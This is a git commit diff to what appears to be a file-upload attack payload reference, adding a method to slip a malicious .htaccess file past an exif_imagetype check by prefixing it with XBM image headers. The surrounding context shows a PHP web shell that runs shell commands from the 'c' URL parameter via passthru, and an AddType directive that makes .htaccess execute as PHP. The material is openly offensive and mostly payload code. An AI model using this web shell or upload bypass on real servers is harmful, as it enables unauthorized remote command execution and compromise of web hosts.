Add exif_imagetype bypass

This commit is contained in:
Vladislav Nechakhin 2019-02-02 17:29:04 +07:00
parent ffde81e2c0
commit b30ac4e5bb

View File

@ -25,7 +25,18 @@ AddType application/x-httpd-php .htaccess
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?> <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
``` ```
# .htaccess upload as image
If on server side for determine the type of an image used exif_imagetype function, try upload .htaccess file like [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) image.
```python
#define test_width 100
#define test_height 100
# .htaccess file
```
## Thanks to ## Thanks to
* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)